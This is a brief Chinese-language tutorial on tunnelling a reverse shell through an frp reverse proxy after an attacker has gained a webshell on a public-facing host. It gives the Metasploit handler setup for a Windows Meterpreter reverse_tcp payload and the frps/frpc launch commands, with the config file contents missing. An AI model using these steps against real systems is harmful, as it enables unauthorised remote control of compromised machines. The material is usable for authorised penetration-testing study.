反向代理
场景描述
如图所示,当攻击者获得了目标主机的一个webshell,需要反弹shell时,由于是公网ip而攻击者是内网ip,所以反弹shell会失败,这时就可以通过反向代理(隧道)来实现
使用工具
frpc(客户端),frps(服务器端)
具体流程
监听本地4444端口
1、启动msf :msfconsole
2、载入监控模块 :use exploit/multi/handler
3、加载payload:
set payload windows/meterpreter/reverse_tcp
set lport 4444
set lhost 127.0.0.1
run
服务器端
frps.exe -c frps.ini
frps.ini文件
客户端frpc
sudo ./frpc -c frpc.ini
frpc.ini
ps:如果一直连接失败,可以尝试重启服务器